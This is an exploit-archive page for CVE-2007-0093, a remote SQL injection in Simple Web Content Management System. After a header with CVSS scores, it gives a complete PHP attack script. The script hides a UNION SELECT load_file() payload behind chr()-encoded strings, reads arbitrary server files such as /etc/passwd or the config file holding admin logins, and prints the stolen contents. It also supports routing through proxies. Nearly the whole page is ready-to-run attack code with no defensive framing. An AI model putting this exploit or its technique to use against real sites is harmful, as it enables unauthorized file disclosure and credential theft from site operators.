Simple Web Content Management System SQL Injection Exploit

2007.01.07
Credit: DarkFig
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2007-0093
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/php <?php /** * This file require the PhpSploit class. * If you want to use this class, the latest * version can be downloaded from acid-root.new.fr. **/ require("phpsploitclass.php"); if($argc < 3) { print(" -------------------------------------------------------- Affected.scr..: Simple Web Content Management System Poc.ID........: 18070102 Type..........: SQL Injection Risk.level....: Medium Src.download..: www.cms-center.com Poc.link......: acid-root.new.fr/poc/18070102.txt Credits.......: DarkFig -------------------------------------------------------- Usage.........: php xpl.txt <url> <file> Options.......: <proxhost:proxport> <proxuser:proxpass> Example.......: php xpl.txt http://hihi.org/ /etc/passwd --------------------------------------------------------n"); exit(1); } $url =$argv[1];$file =$argv[2]; $proxh=$argv[3];$proxa=$argv[4]; $xpl = new phpsploit(); $xpl->agent("Mozilla"); if($proxh) $xpl->proxy($proxh); if($proxa) $xpl->proxyauth($proxa); /* * $id = $_GET['id']; * $query = "SELECT * from content WHERE id = $id"; * ... * @return $row->text; * * Simple SQL injection (register_globals=off ; magic_quotes_gpc=on). * What we want is not in the database, it's in a file (config.php): * * //this are the logins for the admin part. Change them for security. * $login = "test"; //your login for the admin section. * $pass = "1234"; //your login for the admin section. * * PS: Les chr() ont t utiliss dans le but de se foutre de * la gueule des personnes l'utilisant seulement pour d4 h4x0r styl3 =). * */ $header = chr(0x2f).chr(0x3c).chr(0x68).chr(0x74).chr(0x6d).chr(0x6c).chr(0x3e).ch r(0x0d). chr(0x0a).chr(0x3c).chr(0x68).chr(0x65).chr(0x61).chr(0x64).chr(0x3e).ch r(0x0d). chr(0x0a).chr(0x3c).chr(0x74).chr(0x69).chr(0x74).chr(0x6c).chr(0x65).ch r(0x3e). chr(0x63).chr(0x6f).chr(0x6e).chr(0x74).chr(0x65).chr(0x6e).chr(0x74).ch r(0x66). chr(0x72).chr(0x61).chr(0x6d).chr(0x65).chr(0x3c).chr(0x5c).chr(0x2f).ch r(0x74). chr(0x69).chr(0x74).chr(0x6c).chr(0x65).chr(0x3e).chr(0x0d).chr(0x0a).ch r(0x3c). chr(0x6c).chr(0x69).chr(0x6e).chr(0x6b).chr(0x20).chr(0x68).chr(0x72).ch r(0x65). chr(0x66).chr(0x3d).chr(0x22).chr(0x5c).chr(0x2f).chr(0x73).chr(0x74).ch r(0x79). chr(0x6c).chr(0x65).chr(0x2e).chr(0x63).chr(0x73).chr(0x73).chr(0x22).ch r(0x20). chr(0x72).chr(0x65).chr(0x6c).chr(0x3d).chr(0x22).chr(0x73).chr(0x74).ch r(0x79). chr(0x6c).chr(0x65).chr(0x73).chr(0x68).chr(0x65).chr(0x65).chr(0x74).ch r(0x22). chr(0x20).chr(0x74).chr(0x79).chr(0x70).chr(0x65).chr(0x3d).chr(0x22).ch r(0x74). chr(0x65).chr(0x78).chr(0x74).chr(0x5c).chr(0x2f).chr(0x63).chr(0x73).ch r(0x73). chr(0x22).chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x6d).chr(0x65).ch r(0x74). chr(0x61).chr(0x20).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x2d).ch r(0x65). chr(0x71).chr(0x75).chr(0x69).chr(0x76).chr(0x3d).chr(0x22).chr(0x43).ch r(0x6f). chr(0x6e).chr(0x74).chr(0x65).chr(0x6e).chr(0x74).chr(0x2d).chr(0x54).ch r(0x79). chr(0x70).chr(0x65).chr(0x22).chr(0x20).chr(0x63).chr(0x6f).chr(0x6e).ch r(0x74). chr(0x65).chr(0x6e).chr(0x74).chr(0x3d).chr(0x22).chr(0x74).chr(0x65).ch r(0x78). chr(0x74).chr(0x5c).chr(0x2f).chr(0x68).chr(0x74).chr(0x6d).chr(0x6c).ch r(0x3b). chr(0x20).chr(0x63).chr(0x68).chr(0x61).chr(0x72).chr(0x73).chr(0x65).ch r(0x74). chr(0x3d).chr(0x69).chr(0x73).chr(0x6f).chr(0x2d).chr(0x38).chr(0x38).ch r(0x35). chr(0x39).chr(0x2d).chr(0x31).chr(0x22).chr(0x3e).chr(0x0d).chr(0x0a).ch r(0x3c). chr(0x5c).chr(0x2f).chr(0x68).chr(0x65).chr(0x61).chr(0x64).chr(0x3e).ch r(0x0d). chr(0x0a).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x62).chr(0x6f).chr(0x64).ch r(0x79). chr(0x3e).chr(0x2f); $sql = chr(0x70).chr(0x61).chr(0x67).chr(0x65).chr(0x2e).chr(0x70).chr(0x68).ch r(0x70). chr(0x3f).chr(0x69).chr(0x64).chr(0x3d).chr(0x2d).chr(0x31).chr(0x2f).ch r(0x2a). chr(0x2a).chr(0x2f).chr(0x75).chr(0x6e).chr(0x69).chr(0x6f).chr(0x6e).ch r(0x2f). chr(0x2a).chr(0x2a).chr(0x2f).chr(0x73).chr(0x65).chr(0x6c).chr(0x65).ch r(0x63). chr(0x74).chr(0x2f).chr(0x2a).chr(0x2a).chr(0x2f).chr(0x6e).chr(0x75).ch r(0x6c). chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).ch r(0x6e). chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).ch r(0x6c). chr(0x2c).chr(0x6c).chr(0x6f).chr(0x61).chr(0x64).chr(0x5f).chr(0x66).ch r(0x69). chr(0x6c).chr(0x65).chr(0x28).chr(0x63).chr(0x6f).chr(0x6e).chr(0x63).ch r(0x61). chr(0x74).chr(0x28).concatcharfu($file).chr(0x29).chr(0x29).chr(0x2c).ch r(0x6e). chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).ch r(0x6c). chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c); $footer = chr(0x2f).chr(0x3c).chr(0x5c).chr(0x2f).chr(0x62).chr(0x6f).chr(0x64).ch r(0x79). chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x5c).chr(0x2f).chr(0x68).ch r(0x74). chr(0x6d).chr(0x6c).chr(0x3e).chr(0x2f); $xpl->get($url.$sql); $ct = preg_replace($footer,'',$xpl->getcontent()); print preg_replace($header,'',$ct); function concatcharfu($file) { $dat = ''; for($i=0;$i<strlen($file);$i++) { $dat .= 'char('.ord($file[$i]).')'; if($i != (strlen($file)-1)) $dat .= ','; } return $dat; } ?>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top